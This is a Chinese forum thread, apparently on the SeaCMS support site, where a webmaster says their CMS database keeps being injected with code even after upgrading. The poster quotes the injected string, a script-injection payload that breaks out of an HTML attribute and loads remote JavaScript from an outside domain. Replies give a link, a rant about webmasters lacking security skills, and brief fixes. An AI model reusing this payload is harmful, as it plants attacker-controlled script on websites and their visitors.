升级后,数据库还是被注入代码。请问怎么解决啊?

idsscomcn 17天前 400

升级后数据库还是被注入代码,还随机的有字母,很难替换!。请问怎么解决啊?

"><script/**/sr></script><script/**/src=https://www.qiuxiazx.com/data/velist.txt></script><a a="

最新回复 (7)
  • admin 17天前
    0 引用 2
    https://www.seacms.net/index.php?thread-7298.htm
  • 0 引用 3
    是的,升级到9.3一样被注入了。根目录里的搜索文件改名也照样被注入。
  • idsscomcn 17天前
    0 引用 4
    admin https://www.seacms.net/index.php?thread-7298.htm
    具体规则呢?各种办法都用过了,还是不行。哎。。。伤心了。
  • admin 17天前
    0 引用 5
    恒久快乐 是的,升级到9.3一样被注入了。根目录里的搜索文件改名也照样被注入。

    很遗憾,这样你只能去选择其它cms了。安全问题是每个站长都要面对的,很残酷的说,不懂安全技术根本做不了网站。或者说做不大网站。任何一个cms,任何一个程序都会有安全问题,不管你是微软还是谷歌苹果,只是早晚,只是不同时间。只依靠官方升级有很严重的滞后性和不确定性,一个人精力有限,能力有限,没办法。另外说一点,这个行业的站长都被惯坏了,什么都不懂的人可以轻松当站长,昨天还搬砖要饭乞讨那,今天摇身一变就成站长了,完全狗屁不通,啥也不懂。哎,当下形式,且用且珍惜吧,说不定某天,就没有cms了。终究还是要靠自己,自己的本事吃自己的饭。

  • admin 17天前
    0 引用 6

    安全问题是每个站长都要面对的,很残酷的说,不懂安全技术根本做不了网站。或者说做不大网站。任何一个cms,任何一个程序都会有安全问题,不管你是微软还是谷歌苹果,只是早晚,只是不同时间。只依靠官方升级有很严重的滞后性和不确定性,一个人精力有限,能力有限,没办法。另外说一点,这个行业的站长都被惯坏了,什么都不懂的人可以轻松当站长,昨天还搬砖要饭乞讨那,今天摇身一变就成站长了,完全狗屁不通,啥也不懂。哎,当下形式,且用且珍惜吧,说不定某天,就没有cms了。终究还是要靠自己,自己的本事吃自己的饭。

  • a123698741 16天前
    0 引用 7
    用安全狗
  • a123698741 16天前
    0 引用 8
    sea_data.MYD 用软件锁住即可!更新的时候在关闭!
返回
发新帖